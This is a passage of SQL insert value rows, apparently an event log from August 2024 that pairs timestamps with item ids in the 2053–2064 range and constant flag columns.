(12880, '2024-08-09 09:31:12', 1, 2055, 0, 1, 1),
(12881, '2024-08-09 09:31:14', 1, 2054, 0, 1, 1),
(12882, '2024-08-09 09:31:17', 1, 2053, 0, 1, 1),
(12883, '2024-08-09 09:31:19', 1, 2055, 0, 1, 1),
(12884, '2024-08-09 09:31:22', 1, 2060, 0, 1, 1),
(12885, '2024-08-09 09:31:26', 1, 2064, 0, 1, 1),
(12886, '2024-08-09 09:31:29', 1, 2063, 0, 1, 1),
(12887, '2024-08-09 09:31:31', 1, 2062, 0, 1, 1),
(12888, '2024-08-09 09:31:33', 1, 2061, 0, 1, 1),
(12889, '2024-08-09 09:31:35', 1, 2060, 0, 1, 1),
(12890, '2024-08-09 09:31:37', 1, 2059, 0, 1, 1),
(12891, '2024-08-09 09:31:39', 1, 2058, 0, 1, 1),
(12892, '2024-08-09 09:31:42', 1, 2055, 0, 1, 1),
(12893, '2024-08-09 09:31:44', 1, 2054, 0, 1, 1),
(12894, '2024-08-09 09:31:48', 1, 2064, 0, 1, 1),
(12895, '2024-08-09 09:31:50', 1, 2058, 0, 1, 1),
(12896, '2024-08-09 09:31:53', 1, 2059, 0, 1, 1),
(12897, '2024-08-09 09:31:55', 1, 2060, 0, 1, 1),
(12898, '2024-08-09 09:31:57', 1, 2061, 0, 1, 1),
(12899, '2024-08-09 09:31:59', 1, 2062, 0, 1, 1),
(12900, '2024-08-09 09:32:01', 1, 2063, 0, 1, 1),
(12901, '2024-08-09 09:32:06', 1, 2064, 0, 1, 1),
(12902, '2024-08-09 09:32:08', 1, 2063, 0, 1, 1),
(12903, '2024-08-09 09:32:10', 1, 2062, 0, 1, 1),
(12904, '2024-08-09 09:32:12', 1, 2061, 0, 1, 1),
(12905, '2024-08-09 09:32:14', 1, 2060, 0, 1, 1),
(12906, '2024-08-09 09:32:17', 1, 2059, 0, 1, 1),
(12907, '2024-08-09 09:32:19', 1, 2058, 0, 1, 1),
(12908, '2024-08-09 09:32:21', 1, 2055, 0, 1, 1),
(12909, '2024-08-09 09:32:24', 1, 2054, 0, 1, 1),
(12910, '2024-08-09 09:32:36', 1, 2064, 0, 1, 1),
(12911, '2024-08-09 09:32:38', 1, 2058, 0, 1, 1),
(12912, '2024-08-09 09:32:40', 1, 2059, 0, 1, 1),
(12913, '2024-08-09 09:32:42', 1, 2060, 0, 1, 1),
(12914, '2024-08-09 09:32:45', 1, 2061, 0, 1, 1),
(12915, '2024-08-09 09:32:47', 1, 2062, 0, 1, 1),
(12916, '2024-08-09 09:32:49', 1, 2063, 0, 1, 1),
(12917, '2024-08-09 09:33:01', 4, 2054, 0, 1, 1),
(12918, '2024-08-09 11:31:05', 1, 2060, 0, 1, 1),
(12919, '2024-08-09 12:19:30', 1, 2054, 0, 1, 1),
(12920, '2024-08-09 12:40:12', 1, 2061, 0, 1, 1),
(12921, '2024-08-09 12:40:17', 1, 2061, 0, 1, 1),
(12922, '2024-08-09 13:25:02', 1, 2059, 0, 1, 1),
(12923, '2024-08-09 17:11:40', 1, 2063, 0, 1, 1),
(12924, '2024-08-09 19:22:43', 1, 2054, 0, 1, 1),
(12925, '2024-08-09 21:08:31', 1, 2062, 0, 1, 1),
(12926, '2024-08-09 21:09:35', 1, 2058, 0, 1, 1),
(12927, '2024-08-09 23:15:18', 1, 2060, 0, 1, 1),
(12928, '2024-08-10 00:08:07', 1, 2061, 0, 1, 1),
(12929, '2024-08-10 00:10:52', 1, 2058, 0, 1, 1),
(12930, '2024-08-10 04:02:02', 1, 2058, 0, 1, 1),
(12931, '2024-08-10 05:08:52', 1, 2058, 0, 1, 1),
(12932, '2024-08-10 11:00:05', 1, 2054, 0, 1, 1),
(12933, '2024-08-10 20:33:22', 1, 2055, 0, 1, 1),
(12934, '2024-08-10 22:34:58', 1, 2064, 0, 1, 1),
(12935, '2024-08-10 23:51:11', 1, 2058, 0, 1, 1),
(12936, '2024-08-11 00:44:00', 1, 2054, 0, 1, 1),
(12937, '2024-08-11 07:30:23', 1, 2061, 0, 1, 1),
(12938, '2024-08-11 09:20:10', 1, 2053, 0, 1, 1),
(12939, '2024-08-11 10:51:41', 1, 2064, 0, 1, 1),
(12940, '2024-08-11 12:59:09', 1, 2054, 0, 1, 1),
(12941, '2024-08-11 13:28:54', 1, 2063, 0, 1, 1),
(12942, '2024-08-11 13:51:52', 1, 2053, 0, 1, 1),
(12943, '2024-08-11 17:06:57', 1, 2059, 0, 1, 1),
(12944, '2024-08-11 18:52:51', 1, 2054, 0, 1, 1),
(12945, '2024-08-11 19:53:05', 1, 2059, 0, 1, 1),
(12946, '2024-08-12 00:16:04', 1, 2054, 0, 1, 1),
(12947, '2024-08-12 01:52:59', 1, 2061, 0, 1, 1),
(12948, '2024-08-12 08:48:17', 1, 2053, 0, 1, 1),
(12949, '2024-08-12 11:29:23', 1, 2064, 0, 1, 1),
(12950, '2024-08-12 12:23:25', 1, 2054, 0, 1, 1),
(12951, '2024-08-12 12:49:50', 1, 2060, 0, 1, 1),
(12952, '2024-08-12 13:19:44', 1, 2061, 0, 1, 1),
(12953, '2024-08-12 14:12:57', 1, 2059, 0, 1, 1),
(12954, '2024-08-12 14:52:10', 1, 2064, 0, 1, 1),
(12955, '2024-08-12 15:26:50', 1, 2062, 0, 1, 1),
(12956, '2024-08-12 16:22:54', 1, 2055, 0, 1, 1),
(12957, '2024-08-12 17:20:42', 1, 2054, 0, 1, 1),
(12958, '2024-08-12 17:22:00', 1, 2054, 0, 1, 1),
(12959, '2024-08-12 18:02:12', 1, 2054, 0, 1, 1),
(12960, '2024-08-12 18:48:50', 1, 2064, 0, 1, 1),
(12961, '2024-08-12 18:48:52', 1, 2064, 0, 1, 1),
(12962, '2024-08-12 18:48:53', 1, 2064, 0, 1, 1),
(12963, '2024-08-12 18:56:09', 1, 2060, 0, 1, 1),
(12964, '2024-08-12 19:56:22', 1, 2061, 0, 1, 1),
(12965, '2024-08-12 20:22:18', 1, 2054, 0, 1, 1),
(12966, '2024-08-12 20:48:45', 1, 2054, 0, 1, 1),
(12967, '2024-08-12 21:12:28', 1, 2060, 0, 1, 1),
(12968, '2024-08-12 21:40:35', 1, 2061, 0, 1, 1),
(12969, '2024-08-12 22:31:16', 1, 2059, 0, 1, 1),
(12970, '2024-08-12 23:26:23', 1, 2054, 0, 1, 1),
(12971, '2024-08-12 23:51:39', 1, 2060, 0, 1, 1),
(12972, '2024-08-13 00:00:53', 1, 2054, 0, 1, 1),
(12973, '2024-08-13 00:20:52', 1, 2061, 0, 1, 1),
(12974, '2024-08-13 01:11:03', 1, 2059, 0, 1, 1),
(12975, '2024-08-13 01:39:56', 1, 2054, 0, 1, 1),
(12976, '2024-08-13 02:05:19', 1, 2060, 0, 1, 1),
(12977, '2024-08-13 02:33:40', 1, 2061, 0, 1, 1),
(12978, '2024-08-13 03:22:05', 1, 2059, 0, 1, 1),
(12979, '2024-08-13 03:35:09', 1, 2062, 0, 1, 1),
(12980, '2024-08-13 03:35:11', 1, 2058, 0, 1, 1),
(12981, '2024-08-13 03:35:17', 1, 2059, 0, 1, 1),
(12982, '2024-08-13 03:35:20', 1, 2064, 0, 1, 1),
(12983, '2024-08-13 03:35:22', 1, 2063, 0, 1, 1),
(12984, '2024-08-13 03:35:24', 1, 2062, 0, 1, 1),
(12985, '2024-08-13 03:35:26', 1, 2061, 0, 1, 1),
(12986, '2024-08-13 03:35:27', 1, 2060, 0, 1, 1),
(12987, '2024-08-13 03:35:29', 1, 2059, 0, 1, 1),
(12988, '2024-08-13 03:35:31', 1, 2058, 0, 1, 1),
(12989, '2024-08-13 03:35:33', 1, 2055, 0, 1, 1),
(12990, '2024-08-13 03:35:34', 1, 2054, 0, 1, 1),
(12991, '2024-08-13 03:35:36', 1, 2053, 0, 1, 1),
(12992, '2024-08-13 03:35:41', 1, 2055, 0, 1, 1),
(12993, '2024-08-13 03:35:43', 1, 2064, 0, 1, 1),
(12994, '2024-08-13 03:35:45', 1, 2058, 0, 1, 1),
(12995, '2024-08-13 03:35:46', 1, 2059, 0, 1, 1),
(12996, '2024-08-13 03:35:48', 1, 2060, 0, 1, 1),
(12997, '2024-08-13 03:35:50', 1, 2061, 0, 1, 1),
(12998, '2024-08-13 03:35:52', 1, 2062, 0, 1, 1),
(12999, '2024-08-13 03:35:53', 1, 2063, 0, 1, 1),
(13000, '2024-08-13 03:35:55', 1, 2061, 0, 1, 1),
(13001, '2024-08-13 03:35:57', 1, 2054, 0, 1, 1),
(13002, '2024-08-13 03:36:00', 1, 2064, 0, 1, 1),
(13003, '2024-08-13 03:36:03', 1, 2063, 0, 1, 1),
(13004, '2024-08-13 03:36:04', 1, 2062, 0, 1, 1),
(13005, '2024-08-13 03:36:06', 1, 2061, 0, 1, 1),
(13006, '2024-08-13 03:36:08', 1, 2060, 0, 1, 1),
(13007, '2024-08-13 03:36:10', 1, 2060, 0, 1, 1),
(13008, '2024-08-13 03:36:11', 1, 2063, 0, 1, 1),
(13009, '2024-08-13 03:36:16', 1, 2064, 0, 1, 1),
(13010, '2024-08-13 03:36:18', 1, 2058, 0, 1, 1),
(13011, '2024-08-13 03:36:19', 1, 2059, 0, 1, 1),
(13012, '2024-08-13 03:36:21', 1, 2060, 0, 1, 1),
(13013, '2024-08-13 03:36:23', 1, 2061, 0, 1, 1),
(13014, '2024-08-13 03:36:25', 1, 2062, 0, 1, 1),
(13015, '2024-08-13 03:36:26', 1, 2063, 0, 1, 1),
(13016, '2024-08-13 03:36:31', 1, 2064, 0, 1, 1),
(13017, '2024-08-13 03:36:33', 1, 2063, 0, 1, 1),
(13018, '2024-08-13 03:36:34', 1, 2062, 0, 1, 1),
(13019, '2024-08-13 03:36:36', 1, 2061, 0, 1, 1),
(13020, '2024-08-13 03:36:38', 1, 2060, 0, 1, 1),
(13021, '2024-08-13 03:36:40', 1, 2059, 0, 1, 1),
(13022, '2024-08-13 03:36:41', 1, 2058, 0, 1, 1),
(13023, '2024-08-13 03:36:43', 1, 2055, 0, 1, 1),
(13024, '2024-08-13 03:36:45', 1, 2054, 0, 1, 1),
(13025, '2024-08-13 03:36:49', 1, 2064, 0, 1, 1),
(13026, '2024-08-13 03:36:51', 1, 2058, 0, 1, 1),
(13027, '2024-08-13 03:36:53', 1, 2059, 0, 1, 1),
(13028, '2024-08-13 03:36:54', 1, 2060, 0, 1, 1),
(13029, '2024-08-13 03:36:56', 1, 2061, 0, 1, 1),
(13030, '2024-08-13 03:36:58', 1, 2062, 0, 1, 1),
(13031, '2024-08-13 03:37:00', 1, 2063, 0, 1, 1),
(13032, '2024-08-13 03:37:07', 1, 2064, 0, 1, 1),
(13033, '2024-08-13 03:37:09', 1, 2063, 0, 1, 1),
(13034, '2024-08-13 03:37:11', 1, 2062, 0, 1, 1),
(13035, '2024-08-13 03:37:13', 1, 2061, 0, 1, 1),
(13036, '2024-08-13 03:37:14', 1, 2060, 0, 1, 1),
(13037, '2024-08-13 03:37:16', 1, 2059, 0, 1, 1),
(13038, '2024-08-13 03:37:18', 1, 2058, 0, 1, 1),
(13039, '2024-08-13 03:37:20', 1, 2055, 0, 1, 1),
(13040, '2024-08-13 03:37:21', 1, 2054, 0, 1, 1),
(13041, '2024-08-13 03:37:28', 4, 2054, 0, 1, 1),
(13042, '2024-08-13 03:59:18', 1, 2064, 0, 1, 1),
(13043, '2024-08-13 04:34:56', 1, 2062, 0, 1, 1),
(13044, '2024-08-13 05:30:24', 1, 2055, 0, 1, 1),
(13045, '2024-08-13 05:40:25', 1, 2054, 0, 1, 1),
(13046, '2024-08-13 06:02:41', 1, 2064, 0, 1, 1),
(13047, '2024-08-13 06:18:08', 1, 2063, 0, 1, 1),
(13048, '2024-08-13 06:32:04', 1, 2058, 0, 1, 1),
(13049, '2024-08-13 11:45:15', 1, 2059, 0, 1, 1),
(13050, '2024-08-14 00:21:03', 1, 2062, 0, 1, 1),
(13051, '2024-08-14 00:21:07', 1, 2064, 0, 1, 1),
(13052, '2024-08-14 00:21:11', 1, 2060, 0, 1, 1),
(13053, '2024-08-14 00:21:13', 1, 2054, 0, 1, 1),
(13054, '2024-08-14 00:21:16', 1, 2064, 0, 1, 1),
(13055, '2024-08-14 00:21:19', 1, 2063, 0, 1, 1),
(13056, '2024-08-14 00:21:21', 1, 2062, 0, 1, 1),
(13057, '2024-08-14 00:21:23', 1, 2061, 0, 1, 1),
(13058, '2024-08-14 00:21:25', 1, 2060, 0, 1, 1),
(13059, '2024-08-14 00:21:31', 1, 2064, 0, 1, 1),
(13060, '2024-08-14 00:21:33', 1, 2063, 0, 1, 1),
(13061, '2024-08-14 00:21:35', 1, 2062, 0, 1, 1),
(13062, '2024-08-14 00:21:38', 1, 2061, 0, 1, 1),
(13063, '2024-08-14 00:21:40', 1, 2060, 0, 1, 1),
(13064, '2024-08-14 00:21:42', 1, 2059, 0, 1, 1),
(13065, '2024-08-14 00:21:44', 1, 2058, 0, 1, 1),
(13066, '2024-08-14 00:21:46', 1, 2055, 0, 1, 1),
(13067, '2024-08-14 00:21:48', 1, 2054, 0, 1, 1),
(13068, '2024-08-14 00:21:50', 1, 2053, 0, 1, 1),
(13069, '2024-08-14 00:21:53', 1, 2061, 0, 1, 1),
(13070, '2024-08-14 00:21:55', 1, 2059, 0, 1, 1),
(13071, '2024-08-14 00:21:57', 1, 2058, 0, 1, 1),
(13072, '2024-08-14 00:21:59', 1, 2054, 0, 1, 1),
(13073, '2024-08-14 00:22:03', 1, 2063, 0, 1, 1),
(13074, '2024-08-14 00:22:05', 1, 2059, 0, 1, 1),
(13075, '2024-08-14 00:22:07', 1, 2058, 0, 1, 1),
(13076, '2024-08-14 00:22:08', 1, 2055, 0, 1, 1),
(13077, '2024-08-14 00:22:10', 1, 2061, 0, 1, 1),
(13078, '2024-08-14 00:22:15', 1, 2064, 0, 1, 1),
(13079, '2024-08-14 00:22:17', 1, 2063, 0, 1, 1),
(13080, '2024-08-14 00:22:19', 1, 2062, 0, 1, 1),
(13081, '2024-08-14 00:22:21', 1, 2061, 0, 1, 1),
(13082, '2024-08-14 00:22:23', 1, 2060, 0, 1, 1),
(13083, '2024-08-14 00:22:25', 1, 2059, 0, 1, 1),
(13084, '2024-08-14 00:22:27', 1, 2058, 0, 1, 1),
(13085, '2024-08-14 00:22:28', 1, 2055, 0, 1, 1),
(13086, '2024-08-14 00:22:30', 1, 2054, 0, 1, 1),
(13087, '2024-08-14 00:22:33', 1, 2064, 0, 1, 1),
(13088, '2024-08-14 00:22:35', 1, 2058, 0, 1, 1),
(13089, '2024-08-14 00:22:37', 1, 2059, 0, 1, 1),
(13090, '2024-08-14 00:22:38', 1, 2060, 0, 1, 1),
(13091, '2024-08-14 00:22:40', 1, 2061, 0, 1, 1),
(13092, '2024-08-14 00:22:42', 1, 2062, 0, 1, 1),
(13093, '2024-08-14 00:22:44', 1, 2063, 0, 1, 1),
(13094, '2024-08-14 00:22:49', 1, 2064, 0, 1, 1),
(13095, '2024-08-14 00:22:51', 1, 2063, 0, 1, 1),
(13096, '2024-08-14 00:22:53', 1, 2062, 0, 1, 1),
(13097, '2024-08-14 00:22:55', 1, 2061, 0, 1, 1),
(13098, '2024-08-14 00:22:56', 1, 2060, 0, 1, 1),
(13099, '2024-08-14 00:22:58', 1, 2059, 0, 1, 1),
(13100, '2024-08-14 00:23:00', 1, 2058, 0, 1, 1),
(13101, '2024-08-14 00:23:02', 1, 2055, 0, 1, 1),
(13102, '2024-08-14 00:23:04', 1, 2054, 0, 1, 1),
(13103, '2024-08-14 00:23:06', 1, 2064, 0, 1, 1),
(13104, '2024-08-14 00:23:07', 1, 2058, 0, 1, 1),
(13105, '2024-08-14 00:23:09', 1, 2059, 0, 1, 1),
(13106, '2024-08-14 00:23:11', 1, 2060, 0, 1, 1),
(13107, '2024-08-14 00:23:13', 1, 2061, 0, 1, 1),
(13108, '2024-08-14 00:23:15', 1, 2062, 0, 1, 1),
(13109, '2024-08-14 00:23:17', 1, 2063, 0, 1, 1),
(13110, '2024-08-14 00:23:27', 4, 2054, 0, 1, 1),
(13111, '2024-08-14 04:15:49', 1, 2059, 0, 1, 1),
(13112, '2024-08-14 09:25:10', 1, 2062, 0, 1, 1),
(13113, '2024-08-14 12:02:26', 1, 2063, 0, 1, 1),
(13114, '2024-08-14 12:02:31', 1, 2064, 0, 1, 1),
(13115, '2024-08-14 13:19:08', 1, 2060, 0, 1, 1),
(13116, '2024-08-14 13:39:53', 1, 2054, 0, 1, 1),
(13117, '2024-08-14 20:04:17', 1, 2059, 0, 1, 1),
(13118, '2024-08-15 01:17:14', 1, 2059, 0, 1, 1),
(13119, '2024-08-15 05:30:57', 1, 2064, 0, 1, 1),
(13120, '2024-08-15 06:19:18', 1, 2058, 0, 1, 1),
(13121, '2024-08-15 06:19:54', 1, 2064, 0, 1, 1),
(13122, '2024-08-15 06:20:04', 1, 2063, 0, 1, 1),
(13123, '2024-08-15 06:20:12', 1, 2062, 0, 1, 1),
(13124, '2024-08-15 06:20:19', 1, 2061, 0, 1, 1),
(13125, '2024-08-15 06:20:26', 1, 2060, 0, 1, 1),
(13126, '2024-08-15 06:20:34', 1, 2059, 0, 1, 1),
(13127, '2024-08-15 06:20:41', 1, 2058, 0, 1, 1),
(13128, '2024-08-15 06:20:49', 1, 2055, 0, 1, 1),
(13129, '2024-08-15 06:20:56', 1, 2054, 0, 1, 1),
(13130, '2024-08-15 06:21:03', 1, 2053, 0, 1, 1),
(13131, '2024-08-15 06:21:19', 1, 2064, 0, 1, 1),
(13132, '2024-08-15 06:21:27', 1, 2061, 0, 1, 1),
(13133, '2024-08-15 06:21:35', 1, 2058, 0, 1, 1),
(13134, '2024-08-15 06:21:42', 1, 2055, 0, 1, 1),
(13135, '2024-08-15 06:21:51', 1, 2054, 0, 1, 1),
(13136, '2024-08-15 06:21:57', 1, 2060, 0, 1, 1),
(13137, '2024-08-15 06:22:12', 1, 2062, 0, 1, 1),
(13138, '2024-08-15 06:22:19', 1, 2055, 0, 1, 1),
(13139, '2024-08-15 06:22:35', 1, 2064, 0, 1, 1),
(13140, '2024-08-15 06:22:44', 1, 2058, 0, 1, 1),
(13141, '2024-08-15 06:22:51', 1, 2059, 0, 1, 1),
(13142, '2024-08-15 06:22:59', 1, 2060, 0, 1, 1),
(13143, '2024-08-15 06:23:06', 1, 2061, 0, 1, 1),
(13144, '2024-08-15 06:23:13', 1, 2062, 0, 1, 1),
(13145, '2024-08-15 06:23:20', 1, 2063, 0, 1, 1),
(13146, '2024-08-15 06:23:27', 1, 2063, 0, 1, 1),
(13147, '2024-08-15 06:23:34', 1, 2059, 0, 1, 1),
(13148, '2024-08-15 06:23:42', 1, 2061, 0, 1, 1),
(13149, '2024-08-15 06:24:03', 1, 2064, 0, 1, 1),
(13150, '2024-08-15 06:24:11', 1, 2063, 0, 1, 1),
(13151, '2024-08-15 06:24:18', 1, 2062, 0, 1, 1),
(13152, '2024-08-15 06:24:26', 1, 2061, 0, 1, 1),
(13153, '2024-08-15 06:24:35', 1, 2060, 0, 1, 1),
(13154, '2024-08-15 06:24:45', 1, 2059, 0, 1, 1),
(13155, '2024-08-15 06:24:52', 1, 2058, 0, 1, 1),
(13156, '2024-08-15 06:24:59', 1, 2055, 0, 1, 1),
(13157, '2024-08-15 06:25:06', 1, 2054, 0, 1, 1),
(13158, '2024-08-15 06:25:24', 1, 2064, 0, 1, 1),
(13159, '2024-08-15 06:25:33', 1, 2058, 0, 1, 1),
(13160, '2024-08-15 06:25:39', 1, 2059, 0, 1, 1),
(13161, '2024-08-15 06:25:46', 1, 2060, 0, 1, 1),
(13162, '2024-08-15 06:25:53', 1, 2061, 0, 1, 1),
(13163, '2024-08-15 06:26:00', 1, 2062, 0, 1, 1),
(13164, '2024-08-15 06:26:08', 1, 2063, 0, 1, 1),
(13165, '2024-08-15 06:26:31', 1, 2064, 0, 1, 1),
(13166, '2024-08-15 06:26:41', 1, 2058, 0, 1, 1),
(13167, '2024-08-15 06:26:51', 1, 2059, 0, 1, 1),
(13168, '2024-08-15 06:26:59', 1, 2060, 0, 1, 1),
(13169, '2024-08-15 06:27:10', 1, 2061, 0, 1, 1),
(13170, '2024-08-15 06:27:19', 1, 2062, 0, 1, 1),
(13171, '2024-08-15 06:27:27', 1, 2063, 0, 1, 1),
(13172, '2024-08-15 06:27:54', 1, 2064, 0, 1, 1),
(13173, '2024-08-15 06:28:04', 1, 2063, 0, 1, 1),
(13174, '2024-08-15 06:28:13', 1, 2062, 0, 1, 1),
(13175, '2024-08-15 06:28:22', 1, 2061, 0, 1, 1),
(13176, '2024-08-15 06:28:30', 1, 2060, 0, 1, 1),
(13177, '2024-08-15 06:28:37', 1, 2059, 0, 1, 1),
(13178, '2024-08-15 06:28:45', 1, 2058, 0, 1, 1),
(13179, '2024-08-15 06:28:53', 1, 2055, 0, 1, 1),
(13180, '2024-08-15 06:29:00', 1, 2054, 0, 1, 1),
(13181, '2024-08-15 06:29:44', 4, 2054, 0, 1, 1),
(13182, '2024-08-15 07:15:56', 1, 2063, 0, 1, 1),
(13183, '2024-08-15 11:37:45', 1, 2061, 0, 1, 1),
(13184, '2024-08-15 16:51:24', 1, 2060, 0, 1, 1),
(13185, '2024-08-15 20:43:09', 1, 2060, 0, 1, 1),
(13186, '2024-08-15 21:31:36', 1, 2055, 0, 1, 1),
(13187, '2024-08-16 00:25:52', 1, 2058, 0, 1, 1),
(13188, '2024-08-16 04:23:23', 1, 2062, 0, 1, 1),
(13189, '2024-08-16 13:14:22', 1, 2054, 0, 1, 1),
(13190, '2024-08-16 17:02:47', 1, 2059, 0, 1, 1),
(13191, '2024-08-16 17:42:52', 1, 2055, 0, 1, 1),
(13192, '2024-08-17 01:34:54', 1, 2064, 0, 1, 1),
(13193, '2024-08-17 04:27:49', 1, 2058, 0, 1, 1),
(13194, '2024-08-17 04:28:28', 1, 2055, 0, 1, 1),
(13195, '2024-08-17 05:47:52', 1, 2064, 0, 1, 1),
(13196, '2024-08-17 08:17:58', 1, 2059, 0, 1, 1),
(13197, '2024-08-17 11:22:49', 1, 2062, 0, 1, 1),
(13198, '2024-08-17 11:33:30', 1, 2058, 0, 1, 1),
(13199, '2024-08-17 12:18:23', 1, 2058, 0, 1, 1),
(13200, '2024-08-17 17:23:29', 1, 2061, 0, 1, 1),
(13201, '2024-08-17 17:33:19', 1, 2061, 0, 1, 1),
(13202, '2024-08-17 23:39:32', 1, 2061, 0, 1, 1),
(13203, '2024-08-18 04:43:52', 1, 2064, 0, 1, 1),
(13204, '2024-08-18 06:48:57', 1, 2054, 0, 1, 1),
(13205, '2024-08-18 09:37:15', 1, 2062, 0, 1, 1),
(13206, '2024-08-18 14:42:21', 1, 2063, 0, 1, 1),
(13207, '2024-08-18 18:17:57', 1, 2064, 0, 1, 1),
(13208, '2024-08-18 19:34:08', 1, 2060, 0, 1, 1),
(13209, '2024-08-18 23:25:36', 1, 2063, 0, 1, 1),
(13210, '2024-08-19 05:05:06', 1, 2055, 0, 1, 1),
(13211, '2024-08-19 06:01:17', 1, 2061, 0, 1, 1),
(13212, '2024-08-19 07:07:02', 1, 2054, 0, 1, 1),
(13213, '2024-08-19 10:21:06', 1, 2060, 0, 1, 1),
(13214, '2024-08-19 10:54:26', 1, 2058, 0, 1, 1),
(13215, '2024-08-19 13:30:12', 1, 2058, 0, 1, 1),
(13216, '2024-08-19 13:30:15', 1, 2053, 0, 1, 1),
(13217, '2024-08-19 14:02:41', 1, 2061, 0, 1, 1),
(13218, '2024-08-19 18:32:55', 1, 2064, 0, 1, 1),
(13219, '2024-08-19 18:33:07', 1, 2059, 0, 1, 1),
(13220, '2024-08-19 18:33:16', 1, 2055, 0, 1, 1),
(13221, '2024-08-19 18:33:43', 1, 2064, 0, 1, 1),
(13222, '2024-08-19 18:33:54', 1, 2063, 0, 1, 1),
(13223, '2024-08-19 18:34:02', 1, 2062, 0, 1, 1),
(13224, '2024-08-19 18:34:11', 1, 2061, 0, 1, 1),
(13225, '2024-08-19 18:34:19', 1, 2060, 0, 1, 1),
(13226, '2024-08-19 18:34:38', 1, 2064, 0, 1, 1),
(13227, '2024-08-19 18:34:49', 1, 2061, 0, 1, 1),
(13228, '2024-08-19 18:34:57', 1, 2058, 0, 1, 1),
(13229, '2024-08-19 18:35:06', 1, 2055, 0, 1, 1),
(13230, '2024-08-19 18:35:23', 1, 2058, 0, 1, 1),
(13231, '2024-08-19 18:35:31', 1, 2061, 0, 1, 1),
(13232, '2024-08-19 18:35:45', 1, 2054, 0, 1, 1),
(13233, '2024-08-19 18:35:52', 1, 2063, 0, 1, 1),
(13234, '2024-08-19 18:36:00', 1, 2060, 0, 1, 1),
(13235, '2024-08-19 18:36:19', 1, 2064, 0, 1, 1),
(13236, '2024-08-19 18:36:30', 1, 2063, 0, 1, 1),
(13237, '2024-08-19 18:36:37', 1, 2062, 0, 1, 1),
(13238, '2024-08-19 18:36:46', 1, 2061, 0, 1, 1),
(13239, '2024-08-19 18:36:55', 1, 2060, 0, 1, 1),
(13240, '2024-08-19 18:37:03', 1, 2059, 0, 1, 1),
(13241, '2024-08-19 18:37:10', 1, 2058, 0, 1, 1),
(13242, '2024-08-19 18:37:18', 1, 2055, 0, 1, 1),
(13243, '2024-08-19 18:37:27', 1, 2054, 0, 1, 1),
(13244, '2024-08-19 18:37:35', 1, 2053, 0, 1, 1),
(13245, '2024-08-19 18:37:57', 1, 2062, 0, 1, 1),
(13246, '2024-08-19 18:38:06', 1, 2064, 0, 1, 1),
(13247, '2024-08-19 18:38:15', 1, 2058, 0, 1, 1),
(13248, '2024-08-19 18:38:24', 1, 2059, 0, 1, 1),
(13249, '2024-08-19 18:38:31', 1, 2060, 0, 1, 1),
(13250, '2024-08-19 18:38:39', 1, 2061, 0, 1, 1),
(13251, '2024-08-19 18:38:47', 1, 2062, 0, 1, 1),
(13252, '2024-08-19 18:38:55', 1, 2063, 0, 1, 1),
(13253, '2024-08-19 18:39:40', 1, 2064, 0, 1, 1),
(13254, '2024-08-19 18:39:49', 1, 2063, 0, 1, 1),
(13255, '2024-08-19 18:39:57', 1, 2062, 0, 1, 1),
(13256, '2024-08-19 18:40:04', 1, 2061, 0, 1, 1),
(13257, '2024-08-19 18:40:11', 1, 2060, 0, 1, 1),
(13258, '2024-08-19 18:40:20', 1, 2059, 0, 1, 1),
(13259, '2024-08-19 18:40:27', 1, 2058, 0, 1, 1),
(13260, '2024-08-19 18:40:34', 1, 2055, 0, 1, 1),
(13261, '2024-08-19 18:40:42', 1, 2054, 0, 1, 1),
(13262, '2024-08-19 18:40:58', 1, 2064, 0, 1, 1),
(13263, '2024-08-19 18:41:07', 1, 2058, 0, 1, 1),
(13264, '2024-08-19 18:41:15', 1, 2059, 0, 1, 1),
(13265, '2024-08-19 18:41:22', 1, 2060, 0, 1, 1),
(13266, '2024-08-19 18:41:29', 1, 2061, 0, 1, 1),
(13267, '2024-08-19 18:41:37', 1, 2062, 0, 1, 1),
(13268, '2024-08-19 18:41:44', 1, 2063, 0, 1, 1),
(13269, '2024-08-19 18:42:14', 1, 2064, 0, 1, 1),
(13270, '2024-08-19 18:42:23', 1, 2063, 0, 1, 1),
(13271, '2024-08-19 18:42:30', 1, 2062, 0, 1, 1),
(13272, '2024-08-19 18:42:38', 1, 2061, 0, 1, 1),
(13273, '2024-08-19 18:42:45', 1, 2060, 0, 1, 1),
(13274, '2024-08-19 18:42:53', 1, 2059, 0, 1, 1),
(13275, '2024-08-19 18:43:00', 1, 2058, 0, 1, 1),
(13276, '2024-08-19 18:43:08', 1, 2055, 0, 1, 1),
(13277, '2024-08-19 18:43:15', 1, 2054, 0, 1, 1),
(13278, '2024-08-19 18:43:50', 4, 2054, 0, 1, 1),
(13279, '2024-08-19 18:51:24', 1, 2064, 0, 1, 1),
(13280, '2024-08-19 18:51:25', 1, 2064, 0, 1, 1),
(13281, '2024-08-19 19:12:41', 1, 2058, 0, 1, 1),
(13282, '2024-08-19 21:06:36', 1, 2054, 0, 1, 1),
(13283, '2024-08-20 04:19:25', 1, 2061, 0, 1, 1),
(13284, '2024-08-20 05:09:17', 1, 2054, 0, 1, 1),
(13285, '2024-08-20 06:11:08', 1, 2062, 0, 1, 1),
(13286, '2024-08-20 06:11:11', 1, 2062, 0, 1, 1),
(13287, '2024-08-20 06:11:15', 1, 2062, 0, 1, 1),
(13288, '2024-08-20 07:30:24', 1, 2054, 0, 1, 1),
(13289, '2024-08-20 08:34:34', 1, 2054, 0, 1, 1),
(13290, '2024-08-20 12:12:54', 1, 2054, 0, 1, 1),
(13291, '2024-08-20 17:38:16', 1, 2064, 0, 1, 1),
(13292, '2024-08-20 19:20:30', 1, 2054, 0, 1, 1),
(13293, '2024-08-20 19:20:30', 1, 2054, 0, 1, 1),
(13294, '2024-08-20 21:41:36', 1, 2054, 0, 1, 1),
(13295, '2024-08-20 23:34:05', 1, 2060, 0, 1, 1),
(13296, '2024-08-21 00:10:23', 1, 2062, 0, 1, 1),
(13297, '2024-08-21 02:57:59', 1, 2063, 0, 1, 1),
(13298, '2024-08-21 04:07:01', 1, 2058, 0, 1, 1),
(13299, '2024-08-21 06:58:36', 1, 2054, 0, 1, 1),
(13300, '2024-08-21 09:22:05', 1, 2062, 0, 1, 1),
(13301, '2024-08-21 13:52:49', 1, 2064, 0, 1, 1),
(13302, '2024-08-21 14:47:44', 1, 2063, 0, 1, 1),
(13303, '2024-08-21 19:00:17', 1, 2054, 0, 1, 1),
(13304, '2024-08-21 19:15:44', 1, 2060, 0, 1, 1),
(13305, '2024-08-21 19:27:38', 1, 2063, 0, 1, 1),
(13306, '2024-08-21 19:57:39', 1, 2058, 0, 1, 1),
(13307, '2024-08-21 20:47:16', 1, 2055, 0, 1, 1),
